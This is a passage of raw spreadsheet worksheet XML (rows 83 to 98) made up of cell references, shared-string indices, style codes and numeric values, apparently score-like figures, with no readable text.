      </c>
      <c r="AG83" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="84" ht="177.75" customHeight="1">
      <c r="B84" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C84" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D84" s="43" t="s">
        <v>599</v>
      </c>
      <c r="E84" s="43" t="s">
        <v>600</v>
      </c>
      <c r="F84" s="52" t="s">
        <v>601</v>
      </c>
      <c r="G84" s="43" t="s">
        <v>602</v>
      </c>
      <c r="H84" s="44" t="s">
        <v>603</v>
      </c>
      <c r="I84" s="44" t="s">
        <v>582</v>
      </c>
      <c r="J84" s="44" t="s">
        <v>604</v>
      </c>
      <c r="K84" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L84" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M84" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N84" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O84" s="100" t="s">
        <v>605</v>
      </c>
      <c r="P84" s="47">
        <v>3.0</v>
      </c>
      <c r="Q84" s="47">
        <v>4.0</v>
      </c>
      <c r="R84" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S84" s="48" t="s">
        <v>606</v>
      </c>
      <c r="T84" s="48">
        <v>4.0</v>
      </c>
      <c r="U84" s="48">
        <v>24.0</v>
      </c>
      <c r="V84" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W84" s="49" t="s">
        <v>607</v>
      </c>
      <c r="X84" s="49">
        <v>7.0</v>
      </c>
      <c r="Y84" s="49">
        <v>30.0</v>
      </c>
      <c r="Z84" s="46" t="s">
        <v>587</v>
      </c>
      <c r="AA84" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB84" s="62" t="s">
        <v>608</v>
      </c>
      <c r="AC84" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD84" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE84" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF84" s="50" t="s">
        <v>598</v>
      </c>
      <c r="AG84" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="85" ht="177.75" customHeight="1">
      <c r="B85" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C85" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D85" s="43" t="s">
        <v>609</v>
      </c>
      <c r="E85" s="43" t="s">
        <v>610</v>
      </c>
      <c r="F85" s="52" t="s">
        <v>611</v>
      </c>
      <c r="G85" s="43" t="s">
        <v>612</v>
      </c>
      <c r="H85" s="44" t="s">
        <v>613</v>
      </c>
      <c r="I85" s="44" t="s">
        <v>614</v>
      </c>
      <c r="J85" s="44" t="s">
        <v>615</v>
      </c>
      <c r="K85" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L85" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M85" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N85" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O85" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P85" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q85" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R85" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S85" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T85" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U85" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V85" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W85" s="49" t="s">
        <v>616</v>
      </c>
      <c r="X85" s="49">
        <v>2.0</v>
      </c>
      <c r="Y85" s="49">
        <v>2.0</v>
      </c>
      <c r="Z85" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA85" s="61" t="s">
        <v>181</v>
      </c>
      <c r="AB85" s="62" t="s">
        <v>617</v>
      </c>
      <c r="AC85" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD85" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE85" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF85" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG85" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="86" ht="153.75" customHeight="1">
      <c r="B86" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C86" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D86" s="43" t="s">
        <v>609</v>
      </c>
      <c r="E86" s="43" t="s">
        <v>610</v>
      </c>
      <c r="F86" s="52" t="s">
        <v>618</v>
      </c>
      <c r="G86" s="43" t="s">
        <v>619</v>
      </c>
      <c r="H86" s="44" t="s">
        <v>620</v>
      </c>
      <c r="I86" s="44" t="s">
        <v>621</v>
      </c>
      <c r="J86" s="44" t="s">
        <v>622</v>
      </c>
      <c r="K86" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L86" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M86" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N86" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O86" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P86" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q86" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R86" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S86" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T86" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U86" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V86" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W86" s="49" t="s">
        <v>623</v>
      </c>
      <c r="X86" s="49">
        <v>3.0</v>
      </c>
      <c r="Y86" s="49">
        <v>40.0</v>
      </c>
      <c r="Z86" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA86" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB86" s="62" t="s">
        <v>624</v>
      </c>
      <c r="AC86" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD86" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE86" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF86" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG86" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="87" ht="153.75" customHeight="1">
      <c r="B87" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C87" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D87" s="43" t="s">
        <v>625</v>
      </c>
      <c r="E87" s="43" t="s">
        <v>626</v>
      </c>
      <c r="F87" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G87" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H87" s="44" t="s">
        <v>627</v>
      </c>
      <c r="I87" s="44" t="s">
        <v>628</v>
      </c>
      <c r="J87" s="44" t="s">
        <v>629</v>
      </c>
      <c r="K87" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L87" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M87" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N87" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O87" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P87" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q87" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R87" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S87" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T87" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U87" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V87" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W87" s="49" t="s">
        <v>630</v>
      </c>
      <c r="X87" s="49">
        <v>2.0</v>
      </c>
      <c r="Y87" s="49">
        <v>2.0</v>
      </c>
      <c r="Z87" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA87" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB87" s="62" t="s">
        <v>631</v>
      </c>
      <c r="AC87" s="62" t="s">
        <v>632</v>
      </c>
      <c r="AD87" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE87" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF87" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG87" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="88" ht="153.75" customHeight="1">
      <c r="B88" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C88" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D88" s="43" t="s">
        <v>633</v>
      </c>
      <c r="E88" s="43" t="s">
        <v>634</v>
      </c>
      <c r="F88" s="43" t="s">
        <v>635</v>
      </c>
      <c r="G88" s="43" t="s">
        <v>636</v>
      </c>
      <c r="H88" s="44" t="s">
        <v>637</v>
      </c>
      <c r="I88" s="44" t="s">
        <v>638</v>
      </c>
      <c r="J88" s="44" t="s">
        <v>636</v>
      </c>
      <c r="K88" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L88" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M88" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N88" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O88" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P88" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q88" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R88" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S88" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T88" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U88" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V88" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W88" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X88" s="49">
        <v>2.0</v>
      </c>
      <c r="Y88" s="49">
        <v>2.0</v>
      </c>
      <c r="Z88" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA88" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB88" s="62" t="s">
        <v>639</v>
      </c>
      <c r="AC88" s="62" t="s">
        <v>640</v>
      </c>
      <c r="AD88" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE88" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF88" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG88" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="89" ht="153.75" customHeight="1">
      <c r="B89" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C89" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D89" s="43" t="s">
        <v>641</v>
      </c>
      <c r="E89" s="43" t="s">
        <v>642</v>
      </c>
      <c r="F89" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G89" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H89" s="44" t="s">
        <v>643</v>
      </c>
      <c r="I89" s="44" t="s">
        <v>644</v>
      </c>
      <c r="J89" s="44" t="s">
        <v>645</v>
      </c>
      <c r="K89" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L89" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M89" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N89" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O89" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P89" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q89" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R89" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S89" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T89" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U89" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V89" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W89" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X89" s="49">
        <v>2.0</v>
      </c>
      <c r="Y89" s="49">
        <v>2.0</v>
      </c>
      <c r="Z89" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA89" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB89" s="65" t="s">
        <v>646</v>
      </c>
      <c r="AC89" s="62" t="s">
        <v>647</v>
      </c>
      <c r="AD89" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE89" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF89" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG89" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="90" ht="153.75" customHeight="1">
      <c r="B90" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C90" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D90" s="43" t="s">
        <v>648</v>
      </c>
      <c r="E90" s="43" t="s">
        <v>649</v>
      </c>
      <c r="F90" s="43" t="s">
        <v>650</v>
      </c>
      <c r="G90" s="43" t="s">
        <v>651</v>
      </c>
      <c r="H90" s="44" t="s">
        <v>652</v>
      </c>
      <c r="I90" s="44" t="s">
        <v>653</v>
      </c>
      <c r="J90" s="44" t="s">
        <v>654</v>
      </c>
      <c r="K90" s="45" t="s">
        <v>655</v>
      </c>
      <c r="L90" s="45">
        <v>4.0</v>
      </c>
      <c r="M90" s="45">
        <v>20.0</v>
      </c>
      <c r="N90" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O90" s="47" t="s">
        <v>656</v>
      </c>
      <c r="P90" s="47">
        <v>5.0</v>
      </c>
      <c r="Q90" s="47">
        <v>25.0</v>
      </c>
      <c r="R90" s="46">
        <v>2100366.0</v>
      </c>
      <c r="S90" s="48" t="s">
        <v>656</v>
      </c>
      <c r="T90" s="48">
        <v>5.0</v>
      </c>
      <c r="U90" s="48">
        <v>45.0</v>
      </c>
      <c r="V90" s="46">
        <v>2100366.0</v>
      </c>
      <c r="W90" s="49" t="s">
        <v>657</v>
      </c>
      <c r="X90" s="49">
        <v>9.0</v>
      </c>
      <c r="Y90" s="49">
        <v>63.0</v>
      </c>
      <c r="Z90" s="46" t="s">
        <v>658</v>
      </c>
      <c r="AA90" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB90" s="62" t="s">
        <v>659</v>
      </c>
      <c r="AC90" s="62" t="s">
        <v>660</v>
      </c>
      <c r="AD90" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE90" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF90" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG90" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="91" ht="153.75" customHeight="1">
      <c r="B91" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C91" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D91" s="43" t="s">
        <v>661</v>
      </c>
      <c r="E91" s="43" t="s">
        <v>662</v>
      </c>
      <c r="F91" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G91" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H91" s="44" t="s">
        <v>663</v>
      </c>
      <c r="I91" s="44" t="s">
        <v>664</v>
      </c>
      <c r="J91" s="44" t="s">
        <v>665</v>
      </c>
      <c r="K91" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L91" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M91" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N91" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O91" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P91" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q91" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R91" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S91" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T91" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U91" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V91" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W91" s="49" t="s">
        <v>666</v>
      </c>
      <c r="X91" s="49">
        <v>3.0</v>
      </c>
      <c r="Y91" s="49">
        <v>7.0</v>
      </c>
      <c r="Z91" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA91" s="102" t="s">
        <v>188</v>
      </c>
      <c r="AB91" s="62" t="s">
        <v>667</v>
      </c>
      <c r="AC91" s="62" t="s">
        <v>668</v>
      </c>
      <c r="AD91" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE91" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF91" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG91" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="92" ht="153.75" customHeight="1">
      <c r="B92" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C92" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D92" s="43" t="s">
        <v>669</v>
      </c>
      <c r="E92" s="43" t="s">
        <v>670</v>
      </c>
      <c r="F92" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G92" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H92" s="44" t="s">
        <v>671</v>
      </c>
      <c r="I92" s="44" t="s">
        <v>672</v>
      </c>
      <c r="J92" s="44" t="s">
        <v>673</v>
      </c>
      <c r="K92" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L92" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M92" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N92" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O92" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P92" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q92" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R92" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S92" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T92" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U92" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V92" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W92" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X92" s="49">
        <v>2.0</v>
      </c>
      <c r="Y92" s="49">
        <v>2.0</v>
      </c>
      <c r="Z92" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA92" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB92" s="98" t="s">
        <v>674</v>
      </c>
      <c r="AC92" s="62" t="s">
        <v>675</v>
      </c>
      <c r="AD92" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE92" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF92" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG92" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="93" ht="153.75" customHeight="1">
      <c r="B93" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C93" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D93" s="43" t="s">
        <v>676</v>
      </c>
      <c r="E93" s="43" t="s">
        <v>677</v>
      </c>
      <c r="F93" s="43" t="s">
        <v>678</v>
      </c>
      <c r="G93" s="43" t="s">
        <v>679</v>
      </c>
      <c r="H93" s="44" t="s">
        <v>680</v>
      </c>
      <c r="I93" s="44" t="s">
        <v>681</v>
      </c>
      <c r="J93" s="44" t="s">
        <v>682</v>
      </c>
      <c r="K93" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L93" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M93" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N93" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O93" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P93" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q93" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R93" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S93" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T93" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U93" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V93" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W93" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X93" s="49">
        <v>2.0</v>
      </c>
      <c r="Y93" s="49">
        <v>4.0</v>
      </c>
      <c r="Z93" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA93" s="61" t="s">
        <v>188</v>
      </c>
      <c r="AB93" s="98" t="s">
        <v>674</v>
      </c>
      <c r="AC93" s="62" t="s">
        <v>683</v>
      </c>
      <c r="AD93" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE93" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF93" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG93" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="94" ht="153.75" customHeight="1">
      <c r="B94" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C94" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D94" s="43" t="s">
        <v>684</v>
      </c>
      <c r="E94" s="43" t="s">
        <v>685</v>
      </c>
      <c r="F94" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G94" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H94" s="44" t="s">
        <v>686</v>
      </c>
      <c r="I94" s="44" t="s">
        <v>687</v>
      </c>
      <c r="J94" s="44" t="s">
        <v>688</v>
      </c>
      <c r="K94" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L94" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M94" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N94" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O94" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P94" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q94" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R94" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S94" s="57">
        <v>13586.0</v>
      </c>
      <c r="T94" s="48">
        <v>1.0</v>
      </c>
      <c r="U94" s="48">
        <v>1.0</v>
      </c>
      <c r="V94" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W94" s="49" t="s">
        <v>689</v>
      </c>
      <c r="X94" s="49">
        <v>3.0</v>
      </c>
      <c r="Y94" s="49">
        <v>5.0</v>
      </c>
      <c r="Z94" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA94" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB94" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC94" s="62" t="s">
        <v>690</v>
      </c>
      <c r="AD94" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE94" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF94" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG94" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="95" ht="153.75" customHeight="1">
      <c r="B95" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C95" s="43" t="s">
        <v>691</v>
      </c>
      <c r="D95" s="43" t="s">
        <v>692</v>
      </c>
      <c r="E95" s="43" t="s">
        <v>693</v>
      </c>
      <c r="F95" s="43" t="s">
        <v>694</v>
      </c>
      <c r="G95" s="43" t="s">
        <v>695</v>
      </c>
      <c r="H95" s="44" t="s">
        <v>696</v>
      </c>
      <c r="I95" s="44" t="s">
        <v>697</v>
      </c>
      <c r="J95" s="44" t="s">
        <v>698</v>
      </c>
      <c r="K95" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L95" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M95" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N95" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O95" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P95" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q95" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R95" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S95" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T95" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U95" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V95" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W95" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X95" s="49">
        <v>2.0</v>
      </c>
      <c r="Y95" s="49">
        <v>4.0</v>
      </c>
      <c r="Z95" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA95" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB95" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC95" s="62" t="s">
        <v>699</v>
      </c>
      <c r="AD95" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE95" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF95" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG95" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="96" ht="153.75" customHeight="1">
      <c r="B96" s="64" t="s">
        <v>247</v>
      </c>
      <c r="C96" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D96" s="43" t="s">
        <v>700</v>
      </c>
      <c r="E96" s="43" t="s">
        <v>701</v>
      </c>
      <c r="F96" s="43" t="s">
        <v>702</v>
      </c>
      <c r="G96" s="43" t="s">
        <v>703</v>
      </c>
      <c r="H96" s="44" t="s">
        <v>704</v>
      </c>
      <c r="I96" s="44" t="s">
        <v>414</v>
      </c>
      <c r="J96" s="44" t="s">
        <v>705</v>
      </c>
      <c r="K96" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L96" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M96" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N96" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O96" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P96" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q96" s="47"/>
      <c r="R96" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S96" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T96" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U96" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V96" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W96" s="49">
        <v>2051116.0</v>
      </c>
      <c r="X96" s="49">
        <v>1.0</v>
      </c>
      <c r="Y96" s="49">
        <v>1.0</v>
      </c>
      <c r="Z96" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA96" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB96" s="62" t="s">
        <v>706</v>
      </c>
      <c r="AC96" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD96" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE96" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF96" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG96" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="97" ht="153.75" customHeight="1">
      <c r="B97" s="64" t="s">
        <v>247</v>
      </c>
      <c r="C97" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D97" s="43" t="s">
        <v>707</v>
      </c>
      <c r="E97" s="43" t="s">
        <v>708</v>
      </c>
      <c r="F97" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G97" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H97" s="44" t="s">
        <v>709</v>
      </c>
      <c r="I97" s="44" t="s">
        <v>710</v>
      </c>
      <c r="J97" s="44" t="s">
        <v>711</v>
      </c>
      <c r="K97" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L97" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M97" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N97" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O97" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P97" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q97" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R97" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S97" s="48" t="s">
        <v>712</v>
      </c>
      <c r="T97" s="48">
        <v>2.0</v>
      </c>
      <c r="U97" s="48">
        <v>5.0</v>
      </c>
      <c r="V97" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W97" s="49" t="s">
        <v>713</v>
      </c>
      <c r="X97" s="49">
        <v>6.0</v>
      </c>
      <c r="Y97" s="103">
        <v>13.0</v>
      </c>
      <c r="Z97" s="104" t="s">
        <v>75</v>
      </c>
      <c r="AA97" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB97" s="62" t="s">
        <v>714</v>
      </c>
      <c r="AC97" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD97" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE97" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF97" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG97" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="98" ht="153.75" customHeight="1">
      <c r="B98" s="64" t="s">
        <v>247</v>
      </c>
      <c r="C98" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D98" s="43" t="s">
        <v>715</v>
      </c>
      <c r="E98" s="43" t="s">
        <v>716</v>
      </c>
      <c r="F98" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G98" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H98" s="44" t="s">
        <v>717</v>
      </c>
      <c r="I98" s="44" t="s">
        <v>392</v>
      </c>
      <c r="J98" s="44" t="s">
        <v>718</v>
      </c>
      <c r="K98" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L98" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M98" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N98" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O98" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P98" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q98" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R98" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S98" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T98" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U98" s="48" t="s">
